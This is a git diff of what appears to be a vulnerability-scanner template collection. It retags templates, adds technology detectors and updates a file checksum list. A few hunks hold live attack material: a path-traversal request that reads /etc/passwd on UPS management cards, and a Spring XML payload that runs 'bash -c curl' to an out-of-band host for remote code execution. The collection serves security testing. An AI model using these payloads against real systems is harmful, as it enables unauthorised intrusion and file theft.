@ -38,4 +38,4 @@ http:
part: header
words:
- "application/json"
# digest: 490a004630440220562a9f8ba6edfa7b4aee0ee747db5bea2b7a92f48e4880e87f7c2c0e1f0e53350220284a8c20ed6356ee243fe41581351c7cdafc9037099d94a5f34a45813725f77f:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205c9c86f3c046857119bb1a670b24f3214292931dc0fa8f3f2de2a774d270003f0220494fa1162786a29761083cf667b6d9634363502ffaa72629ab5c9ad4ac70494a:922c64590222798bb761d5b6d8e72950

View File

@ -3,12 +3,12 @@ id: drupal-install
info:
name: Drupal Install
author: NkxxkN
severity: low
severity: high
description: Drupal Install panel exposed.
metadata:
max-request: 2
shodan-query: http.component:"drupal"
tags: exposure,drupal
tags: misconfig,drupal,install,exposure
http:
- method: GET
@ -23,4 +23,4 @@ http:
- type: word
words:
- "<title>Choose language | Drupal</title>"
# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220115cf9e237a9e0e09034a814da536ec254ae826df2023819714ad7677814606102207ecda93edc69d914ee07bed7be0c76fcae80cd410e6a511552cd3686c8e6e785:922c64590222798bb761d5b6d8e72950

View File

@ -16,7 +16,7 @@ info:
cwe-id: CWE-441
metadata:
max-request: 25
tags: exposure,config,proxy,misconfig,bruteforce
tags: exposure,config,proxy,misconfig,fuzz
http:
- raw:
@ -135,4 +135,4 @@ http:
- (!contains(body_1, "ssh")) && ((contains(body_2, "ssh") || contains(body_3, "ssh")) || contains(body_4, "ssh") || contains(body_5, "ssh") || contains(body_6, "ssh") || contains(body_7, "ssh") || contains(body_8, "ssh") || contains(body_9, "ssh") || contains(body_10, "ssh") || contains(body_11, "ssh") || contains(body_12, "ssh") || contains(body_13, "ssh") || contains(body_14, "ssh") || contains(body_15, "ssh") || contains(body_16, "ssh") || contains(body_17, "ssh") || contains(body_18, "ssh") || contains(body_19, "ssh") || contains(body_20, "ssh") || contains(body_21, "ssh") || contains(body_22, "ssh") || contains(body_23, "ssh") || contains(body_24, "ssh"))
- (!contains(body_1, "SSH")) && ((contains(body_2, "SSH") || contains(body_3, "SSH")) || contains(body_4, "SSH") || contains(body_5, "SSH") || contains(body_6, "SSH") || contains(body_7, "SSH") || contains(body_8, "SSH") || contains(body_9, "SSH") || contains(body_10, "SSH") || contains(body_11, "SSH") || contains(body_12, "SSH") || contains(body_13, "SSH") || contains(body_14, "SSH") || contains(body_15, "SSH") || contains(body_16, "SSH") || contains(body_17, "SSH") || contains(body_18, "SSH") || contains(body_19, "SSH") || contains(body_20, "SSH") || contains(body_21, "SSH") || contains(body_22, "SSH") || contains(body_23, "SSH"))
condition: or
# digest: 4b0a004830460221009f48b01f26136702795a2cffb7b6b7816d70dea40d4ab51925b3e3bf0c11b6af0221008563de6541e201ff78bf5ab81bf17f7a208c87c839acd797ffe0b201c82f550f:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100eb06c1baf9b355cae11480ca66689b197c6d0fe975d34a9e5cf6c0a7ce2db424022100de87b67ae05bd14e68e9ff47470c1726b431bafbb4f67c5c9dd7b6b4d93c1456:922c64590222798bb761d5b6d8e72950

View File

@ -16,7 +16,7 @@ info:
cwe-id: CWE-441
metadata:
max-request: 6
tags: exposure,config,proxy,misconfig,bruteforce
tags: exposure,config,proxy,misconfig,fuzz
http:
- raw:
@ -60,4 +60,4 @@ http:
- (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
- (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
- (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works"))
# digest: 4a0a00473045022050f32d433907eb641719e6b7b39ff4bb5fbcf7f2001078134c78c7c7eb85058f0221009485e32b4f5ae470fb7df0b41a812d9f95bc1be46caa1c5a0979f2779bcc299e:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204a69f7542ff2a50a4165edd9f554e7c7c52121f127a95bcb8f97c86b4affaf7c0220716d16b16fa8d641d6645b0bc6d82b3b3a5be1554d8b650f469656640b38ee7f:922c64590222798bb761d5b6d8e72950

View File

@ -16,7 +16,7 @@ info:
cwe-id: CWE-441
metadata:
max-request: 8
tags: exposure,config,proxy,misconfig,bruteforce
tags: exposure,config,proxy,misconfig,fuzz
http:
- raw:
@ -61,4 +61,4 @@ http:
- (!regex("(?i)SSH-[.]+-+",body_1)) && (!regex("(?i)SSH-[.]+-+",body_2)) && (regex("(?i)SSH-[.]+-+",body_4))
- (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6))
- (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8)))
# digest: 4a0a0047304502210081f5f214233f6f6cf91e16579381ca30fc0ce8dcf65f0a90f70a1e8d06d24d84022078ceab298b767ed7830bd6f6b69ea8c510687cc8937183784815309cc9cbb294:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ea2fb3ebd78e1c5f154da5c2752dc9b4c3072b6969bbd2eb1e471d806a1e587502205b65830d95619ed72f037ad2ab405b591674b9feb52e35a4d44a6cb84db66ddb:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,28 @@
id: directus-detect
info:
name: Directus - Detect
author: ricardomaia
severity: info
description: |
Directus is a content manager with dynamic access API generation and transparent integration with the main databases.
reference:
- https://directus.io/
metadata:
max-request: 1
google-query: 'X-Powered-By: Directus'
verified: true
tags: tech,directus,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "X-Powered-By: Directus"
case-insensitive: true
# digest: 490a004630440220479c02cfe34e7b2c20a1a976a14a53f0b1aafded106d55d08b9805cd3715425c02202a6fb91a2289a5fae5ff1ce56b8fef09bfcec164a5546e1ad4a8145584d5212b:922c64590222798bb761d5b6d8e72950

View File

@ -11417,6 +11417,7 @@ http:
name: softether-vpn
words:
- <li>manage this vpn server or vpn bridge<ul>
case-insensitive: true
- type: word
name: softnext-spam
@ -15064,4 +15065,4 @@ http:
words:
- "x-dispatcher:"
case-insensitive: true
# digest: 4a0a00473045022100e202b5b8367df139a20f5ff3fced4c3ec57f5c5c98c2c42e3079952ccc4cf87502204d5331301337b21ea90535286f9393bc4140b0fde578aef1869201af8fca701e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100bc94744c796eb79eba218d1c041ec0e817654420bfc1a1c188d90dcfc8506dcc0221008763af93a66376ac9b4dbee14f6d8a1db56f84bfc29474faefd0f50ffd68ea6b:922c64590222798bb761d5b6d8e72950

View File

@ -13,7 +13,7 @@ info:
verified: true
max-request: 50
shodan-query: Graylog
tags: tech,graylog,api,swagger,bruteforce
tags: tech,graylog,api,swagger,fuzz
http:
- method: GET
@ -88,4 +88,4 @@ http:
- "status_code == 401"
- "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')"
condition: and
# digest: 490a0046304402205f8ec88c8c872e1f72f827d27f188fb5cf33790e02129f8c031dcf388ae2267302206b1141795fc1f4b771b9f166252c932adacbd6f72f94e352eb1e0e392659f9d4:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950

View File

@ -9,11 +9,14 @@ info:
max-request: 1
tags: tech,microsoft,iis
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 4
matchers-condition: and
matchers:
- type: word
@ -21,14 +24,9 @@ http:
words:
- "IIS"
- type: status
status:
- 200
extractors:
- type: kval
part: header
kval:
- Server
# digest: 490a0046304402204aec8d1c4678a40a8ca831d952b351c4ca885fb845222a559099426e6a27ba9602204f9487670472a494fcecc37f1ebc08e68f6c3007de6fae438c5f5b7210e66a87:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502207a63b4fb5117f7f1168ba477b97deaa35e7e38c9355639a7df7c8f6f54fa960c022100e3d3f3c25ecff01f75a723ca2df3e64e5ea725d7cc61f70ef54e41f6899fc359:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,25 @@
id: wing-ftp-service-detect
info:
name: Wing FTP Service - Detect
author: ritikchaddha
severity: info
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
max-request: 1
verified: true
shodan-query: "Wing FTP Server"
tags: tech,ftp,wing,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Wing FTP Server"
# digest: 4b0a00483046022100c80a28fe09665c71ca345c950405518bec7b02defcbed410c0a59c743e24da46022100bc4ae224a03b1cecc0f9646db3ce15f82e26125b2eb0fd647cd0ba7395be4be9:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,38 @@
id: ups-network-lfi
info:
name: UPS Network Management Card 4 Path Traversal
author: Kazgangap
severity: high
description: |
UPS Network Management Card version 4 suffers from a path traversal vulnerability.
reference:
- https://packetstormsecurity.com/files/177626/upsnmc4-traversal.txt
- https://www.exploit-db.com/exploits/51897
metadata:
max-request: 1
verified: true
shodan-query: html:"UPS Network Management Card 4"
tags: ups,lfi
http:
- method: GET
path:
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a00473045022100f89ac4d5fc64a14de49e8cb3c38e50b5639b4232cf5be0590f1bfdc1d4a6984f0220378dff779681382e54be7b3f7a240fff7417804e84cb9fc58c17e2c84cb04e0f:922c64590222798bb761d5b6d8e72950

View File

@ -14,7 +14,7 @@ info:
shodan-query: title:"通达OA"
fofa-query: title="通达OA"
zoomeye-query: app:"通达OA"
tags: tongda,auth-bypass,bruteforce
tags: tongda,auth-bypass,fuzz
http:
- raw:
@ -37,4 +37,4 @@ http:
- "status_code_1 == 200 && status_code_2 == 200"
- "contains(body_2,'user_id:') && contains(body_2,'user_name:') && contains(body_2,'var loginUser')"
condition: and
# digest: 490a0046304402204a06da29f8ed74b30b3c4ab83d3cc755122295c433b365b4826bb259ca49790402202ad3e465c123744f61cdbec2d6264a43a222ffa353f4343897a41deecc126215:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100cf6eb6c3146832a9fd31f8913265b52fc3f58057391d7f8f553d6c50c1fd2de002200254175ba248dd65f2ebf2ed5c9337787d304c2c1222925bd65b7b993550cf9b:922c64590222798bb761d5b6d8e72950

View File

@ -10,7 +10,7 @@ info:
- https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
metadata:
max-request: 276
tags: wordpress,php,xmlrpc,bruteforce
tags: wordpress,php,xmlrpc,fuzz
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'xmlrpc'
- 'isAdmin'
condition: and
# digest: 4a0a0047304502210099e858a727502be5806faf777940504e60eb4ff367ce58779cbd952547018c3502207b54c8f1b32b85f47ed048a7fd956cbbd58a85fdf1895e055b89e9bc1ed0653d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100edfa1eaae603d4a662ebaa0eaddba9894ee90c4bd3431bcaae13280d7e9c2fa5022027b501e990478aaca56cc4162f495540c80217172b1c28e0b1516864f9913ad8:922c64590222798bb761d5b6d8e72950

View File

@ -29,7 +29,8 @@ info:
verified: true
vendor: vmware
product: aria_operations_for_networks
tags: js,packetstorm,cve,cve2019,vmware,aria,rce,bruteforce,vrealize
tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize
variables:
keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory
@ -64,4 +65,4 @@ javascript:
- type: dsl
dsl:
- success && response
# digest: 4b0a004830460221009feafd85e7304801a5d27779281ba1e404c8bf1c26f4d8e443ace45603abfd980221009be9e788b356d6cf16aae887e936303bd2c812545e058d765238b4d65fbac6b2:922c64590222798bb761d5b6d8e72950
# digest: 4b0a0048304602210096baa6d7adfe80f8e87172810d28e0fb98afca70b4c7081653717d290b1c455e022100f8f25d688999956d0f6f18c2c522b6946f46e35c415fe928b97369971def3226:922c64590222798bb761d5b6d8e72950

View File

@ -40,7 +40,7 @@ javascript:
let b = m2.Buffer();
let name=Host+':'+Port;
let conn = m1.Open('tcp', name);
let randomvar = '{{randstr}}'
let randomvar = '{{randstr}}'.toLowerCase();
var Base64={encode: btoa}
exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
@ -61,4 +61,4 @@ javascript:
- 'contains(interactsh_protocol, "dns")'
- 'contains(interactsh_request, response)'
condition: and
# digest: 4a0a004730450220072242f64d49392155c8bd39d873097b2d61c950543e6aed9e10de3504f6c99202210089c83d599670a33b43a312a55f6ef5dce55b3861aa538160fa40802c06d6a00f:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c9d0d2f9b39ad03129d83fcc2561733c1ffdb8119572c0f222d529083466f7b1022100b6db80c8ccd45b35ec5ebafceefbf53d92b365fc01041ad991036346155950c4:922c64590222798bb761d5b6d8e72950

View File

@ -7,7 +7,7 @@ info:
metadata:
max-request: 223
shodan-query: port:1433
tags: js,ssh,default-login,network,bruteforce
tags: js,ssh,default-login,network,fuzz
javascript:
- pre-condition: |
@ -37,4 +37,4 @@ javascript:
- "response == true"
- "success == true"
condition: and
# digest: 4a0a0047304502201075a52fb072b30eaf6d0a90a65cfd28bb977d1e550dea81be5fdf48eb9d4a40022100d71ccf516beef02a23e98f5041349bad1edefa0e3c4d4f83d7a3789ceb5c26e9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022014aa9c1a1b17b3914b4ba3f3233452eebae9a55538d97c0e80eda65e1d207f4d022100bb2595041170eae66cc6dd5fcbf9b33a0b3d61a92fe5a77c1aa48a600f8f420c:922c64590222798bb761d5b6d8e72950

View File

@ -12,7 +12,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 1
tags: network,mysql,bruteforce,db,misconfig
tags: network,mysql,db,misconfig
tcp:
- host:
@ -23,4 +23,4 @@ tcp:
- type: word
words:
- "mysql_native_password"
# digest: 490a00463044022035dcdfe3a3a04ff5cd925e153aac37f32ffd2ce11c80930db28848f2858ae91c0220477ec8d91cdb25472d209662968dbdfbe66331774355dd1b02db883d28c53906:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220271c76e40a4a3b9020fe8bf117a2f647a67b98bca02aa2eab3cab74bd6853b7c022100f4fb333ac1fd78a79bab65871e12be4c741ce43d3347f9f742029f49033216b1:922c64590222798bb761d5b6d8e72950

View File

@ -11,7 +11,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 1
tags: network,tidb,bruteforce,db,misconfig
tags: network,tidb,db,misconfig
tcp:
- host:
@ -24,4 +24,4 @@ tcp:
- "mysql_native_password"
- "TiDB"
condition: and
# digest: 4b0a00483046022100e049b1c055324354cc32587bf2b1adb5f41ae71e0470fa51e45ae3c0349605fb02210090caa87661256bffc263735cf58cbc73eadd15af8c05f627baebba0c3c5e5e3e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a0048304602210080382e3d0d64072e7aeb74e7b56c3b9081e554f2ce57ee36b6fe778c39567ffa022100cd086a1912176473d7ec2411f0b8a8b421e8b31f805bc41ae8c37fa2c1cbb3e2:922c64590222798bb761d5b6d8e72950

View File

@ -10,7 +10,7 @@ TOP-10.md:06a54531fef2bfc5ec2fa38485a3e30c247a3132
cloud/enum/aws-app-enum.yaml:26d0dcf57c7ba8003940ed1d53a62971564b2018
cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f
cloud/enum/azure-db-enum.yaml:3d29a3c86288356d862922ef0527de99187bf734
cloud/enum/azure-vm-cloud-enum.yaml:d40729aac7a1bfc55ceaf617c16a08c78fe9600f
cloud/enum/azure-vm-cloud-enum.yaml:6d9043c907009b2ff6afc6cd09bd35a6d27f6fe9
cloud/enum/azure-website-enum.yaml:037397591c799d32eb8abc94a346ff0805d68204
cloud/enum/gcp-app-engine-enum.yaml:b22ff0601a3f7f6ddc39e39ab9dc34410d213e41
cloud/enum/gcp-bucket-enum.yaml:896300c26517adf67feb80304f5edb25590a03c4
@ -97,16 +97,16 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
config/README.md:48976bdcd95e99dbc8d6d2a9004df27e0bfa8494
config/bugbounty.yml:d45915281bcb027c5aac65ec0f66fda4c914bd12
config/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f
config/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e
config/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9
config/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418
config/pentest.yml:c7b04a39e2efaf1a5f627da9b49ecf714d927f0e
config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196
config/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8
config/recommended.yml:eb4d0cb29634218f0279692e8c59fa1906d7148c
config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b
contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159
cves.json:51d8ac58d8ffdf6cfd4660d3e19373bb08bb6605
cves.json-checksum.txt:fdca644f563bcfe217c57881fc5991db50a942e4
cves.json:3b21f179e553a113562af785def57c341b663071
cves.json-checksum.txt:e03adc785e821e31dd4936f083dc56fbb0b302df
dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4
dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24
dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2
@ -122,8 +122,11 @@ dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58
dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735
dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656
dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87
dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b
dns/spf-record-detect.yaml:6aad264acb43bab9f128417e59b116cb7b35868e
dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7
dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70
dns/txt-service-detect.yaml:c331256e50faf2211d80f1f973f42c748d86a5d1
dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259
file/android/adb-backup-enabled.yaml:4ca96a12120754577166567e047e6735d1214891
file/android/biometric-detect.yaml:27a81bc01a126a6923c702d556dac9da857971d8
@ -973,7 +976,7 @@ http/cves/2012/CVE-2012-2371.yaml:c9b170834b0f6878fbd65a84289f9dde6cdf6edf
http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f
http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92
http/cves/2012/CVE-2012-4242.yaml:d4acd90297d0e2c72a092b7a02a3cd8d9b532923
http/cves/2012/CVE-2012-4253.yaml:8191f7e69d1dbec2c0b9ea2f687eafa87eeb2214
http/cves/2012/CVE-2012-4253.yaml:22bb780ede0f6ee252aa15a98a2b1c8d437494e4
http/cves/2012/CVE-2012-4273.yaml:d7e6647482c7d87038483b2bc94a26745bb3c841
http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5
http/cves/2012/CVE-2012-4768.yaml:61df87600a157bab6ca0ae1244cf87d5dbb36af7
@ -1199,7 +1202,7 @@ http/cves/2017/CVE-2017-16894.yaml:0c7f7d0bdb16cdff6e7a380ba56208eb1ca9d6e6
http/cves/2017/CVE-2017-17043.yaml:b45105c0de0d90d61a79191de73976e9cd4fb790
http/cves/2017/CVE-2017-17059.yaml:d40f8c2b908798457c9b02fa98a480b8bc0a7215
http/cves/2017/CVE-2017-17451.yaml:04b0b3fec8b256c76cef8ea892836c2e420878b8
http/cves/2017/CVE-2017-17562.yaml:d3e0e64e607cfaaace054ae2b40fd4b792f19b92
http/cves/2017/CVE-2017-17562.yaml:2e22c184cd57f7425fba3827242a122c39dc86e8
http/cves/2017/CVE-2017-17731.yaml:1666574cd4dfc7a3995867c7c4b621b267b885ff
http/cves/2017/CVE-2017-17736.yaml:877434782e6a2c5b3095498877a022c3551b6ca8
http/cves/2017/CVE-2017-18024.yaml:6b154b9615599e11764e703081eca6329935ee5e
@ -1496,7 +1499,7 @@ http/cves/2019/CVE-2019-16932.yaml:182fef4932dc7931c45cd3d7aebdaeef9ded81e8
http/cves/2019/CVE-2019-16996.yaml:ad524a9c60b54d610e8c55acaa46e4958a9b8dce
http/cves/2019/CVE-2019-16997.yaml:e103b4c103866170ecfaef2fcf0e2cf88609b940
http/cves/2019/CVE-2019-17270.yaml:8f282f5849f13dda11bbb8837079bb223d9687fb
http/cves/2019/CVE-2019-17382.yaml:8b758f47cbcdde1a0409b679b261ccf5fcbd7d50
http/cves/2019/CVE-2019-17382.yaml:f76bdf75f84fdcae6c031cc28c3420d8dc40f808
http/cves/2019/CVE-2019-17418.yaml:dbeea758a5b8de4c18d2d8790798711113d69195
http/cves/2019/CVE-2019-17444.yaml:7b94376c34d962236141cba63543376257005654
http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671
@ -2398,7 +2401,7 @@ http/cves/2022/CVE-2022-1933.yaml:97c269db3367ffd56494243b090e307b4eb0b586
http/cves/2022/CVE-2022-1937.yaml:f888a42c920fb30ae5b563bf642af334cd97da95
http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d
http/cves/2022/CVE-2022-1952.yaml:4c4d64ceb64295942d0d9c2c1ae79a9bc6a16ee7
http/cves/2022/CVE-2022-2034.yaml:a56290dfd329c3ac92bf63ca31f9a8ccfafd7386
http/cves/2022/CVE-2022-2034.yaml:6d1a2c994d2ebda1cdcdc84b36237565c66c592a
http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944
http/cves/2022/CVE-2022-21500.yaml:7a87435ea2a54ac9c454a344a87fd21e51758b36
http/cves/2022/CVE-2022-21587.yaml:9e40fc00a04665d81ac142e197d40f1926a521c6
@ -2480,7 +2483,7 @@ http/cves/2022/CVE-2022-25489.yaml:5c5c7a7388f9e133b0cf380bad27eeaebb0c2a74
http/cves/2022/CVE-2022-25497.yaml:07424dc06af0ea2d10c5aa1a201ce4d0f2d26848
http/cves/2022/CVE-2022-2551.yaml:a2dc5d4686710a2e9aeea1bdadf8f7fac2f3766f
http/cves/2022/CVE-2022-25568.yaml:aabffcf5827e7ee05211b2651ca350e913371665
http/cves/2022/CVE-2022-2599.yaml:3acebe0eef8eedb44906ac2579e6d0f0024a48d3
http/cves/2022/CVE-2022-2599.yaml:f576fefcf8da91a4c868c4b06cad0a2ed36884cb
http/cves/2022/CVE-2022-26134.yaml:788a7f51e1550cc5770aab979234ac35b54d2505
http/cves/2022/CVE-2022-26138.yaml:15d0534ab6765d2e536070eda15d020e04f43abc
http/cves/2022/CVE-2022-26148.yaml:f37f9182974b9dd8d49af32a7ef9841fe7d704ae
@ -2819,7 +2822,7 @@ http/cves/2023/CVE-2023-24278.yaml:e397c7d647c7517b78e44dbc79c8fcbc80480623
http/cves/2023/CVE-2023-24322.yaml:c4b5cc0d4d70fa16682f706a954b95c84e0e7896
http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477
http/cves/2023/CVE-2023-24488.yaml:8a381e70fd0643ed5d1371edb70b40e25e9b5ff8
http/cves/2023/CVE-2023-24489.yaml:c8aa249866735b4ad90a721d721d9e9426628ad8
http/cves/2023/CVE-2023-24489.yaml:c895cc71b777b3ada793ebcddd00274157f7927d
http/cves/2023/CVE-2023-24657.yaml:1efdbfecef2aacf600fb007989d4efc6aa9d7fbe
http/cves/2023/CVE-2023-24733.yaml:f1b740ac9ba1fc859deb3c69798e1bc3d302ed4e
http/cves/2023/CVE-2023-24735.yaml:e38322978b1598d32056adb11572c6c401107c40
@ -3055,7 +3058,7 @@ http/cves/2023/CVE-2023-5244.yaml:32f7df605dda4c16610c548f773673f5b69c67a5
http/cves/2023/CVE-2023-5360.yaml:387bf52196ed2e1d383a97ea158fe90b94d213b9
http/cves/2023/CVE-2023-5375.yaml:394c4b2b0867a8922fcfad500616380c117983d8
http/cves/2023/CVE-2023-5556.yaml:7d50d6e2861161f90b7876147d3405d5c7eeccf4
http/cves/2023/CVE-2023-5830.yaml:85965a9925a1cd03639181416b2c20995b33f501
http/cves/2023/CVE-2023-5830.yaml:76c2cd53d3eb9187c00e98e057fa4cdd29412e6a
http/cves/2023/CVE-2023-5914.yaml:93f627b753ac975d5a74a2532a42aa9449682207
http/cves/2023/CVE-2023-6018.yaml:e840e467eab7d472ae719996be481de06fafb2cf
http/cves/2023/CVE-2023-6020.yaml:68c05fb386a060d81834e2ddbaefb5779ae81b51
@ -3085,6 +3088,7 @@ http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e
http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15
http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1
http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949
http/cves/2024/CVE-2024-1212.yaml:5671b80e9ab3c9274bd98bbeb8fe508980393f85
http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983
http/cves/2024/CVE-2024-1709.yaml:7f5ad668e9c8e5ab56afee96df8907d7ccc71e0b
http/cves/2024/CVE-2024-21644.yaml:e8d58594c2dc1021f9107eee925f11791e0627e7
@ -3101,6 +3105,7 @@ http/cves/2024/CVE-2024-25735.yaml:bb8f329838a1758c223d85cdbe23c820f8b61640
http/cves/2024/CVE-2024-27198.yaml:c4f066c0332dea8b23c9aa0990baa6b6b5c806bb
http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d
http/cves/2024/CVE-2024-27497.yaml:5ee80d14253ccdeec8c2bdc1c7e82a8062b4f487
http/cves/2024/CVE-2024-27954.yaml:d1056017d0cbf62dc6a2b0b6372ca2980992155c
http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce
http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c
http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7
@ -3108,7 +3113,7 @@ http/default-logins/activemq/activemq-default-login.yaml:d9c1716e5fab0e3cdd0ebaa
http/default-logins/adminer-default-login.yaml:1dc0fbedf2bb856303230bf3c5be9f2ad1bf9f0e
http/default-logins/aem/aem-default-login.yaml:932701c69be0aa181e7b40a5a6189ba34578015b
http/default-logins/aem/aem-felix-console.yaml:43658ba960762d06a5c8be673078e3049cb7e71f
http/default-logins/alibaba/canal-default-login.yaml:2c0e5475e64363fb8ec6f6748768c09a9da193de
http/default-logins/alibaba/canal-default-login.yaml:53bee91e5473ba3be493bdb74fc8b2789b6f72fd
http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9
http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe
http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b
@ -3206,7 +3211,7 @@ http/default-logins/ofbiz/ofbiz-default-login.yaml:2e6eea7863853fca0a5546a479d43
http/default-logins/openemr/openemr-default-login.yaml:e47d165fc7a306238827e4ea1497307f932890cd
